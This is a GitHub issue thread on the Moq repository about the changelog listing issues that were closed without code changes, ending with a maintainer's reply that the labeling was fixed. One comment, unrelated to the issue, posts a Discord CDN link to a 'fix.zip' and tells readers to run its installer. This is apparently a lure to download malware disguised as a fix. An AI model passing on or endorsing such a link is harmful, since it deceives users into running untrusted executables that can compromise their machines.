### ISSUE TITLE
Changelog should not contain issues which didn't lead to any changes

### ISSUE THREAD

**Issue by cremor** [devlooped/moq#1511]
The [changelog](https://github.com/devlooped/moq/blob/main/changelog.md) lists some GitHub issues as "fixed bugs" which actually were closed without any code change. For example:

(To delete) #1497
mock.Protected().Verify() does not work correctly #1493
Moq library throwing TypeIniatilizationException. #1459
Supporting .NET8 #1462

This is confusing. Could you please clean it up?

And maybe there is a setting in the tool that creates the changelog that could prevent it from adding issues that were closed as "not planned"? That would at least excluded some of them. But not all, so manual checks before a release would be good.

[![Back this issue](https://raw.githubusercontent.com/devlooped/SponsorLink/main/docs/assets/img/separator.png "Back this issue")](https://www.devlooped.com/SponsorLink/github/issues/?s=devlooped)
[![Back this issue](https://img.shields.io/badge/backed-%240-EA4AAA?logo=githubsponsors "Back this issue")](https://www.devlooped.com/SponsorLink/github/issues/?s=devlooped)

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by kzu** [comment]
Fixed. It was due to improper labeling of those issues. Thanks for pointing it out!
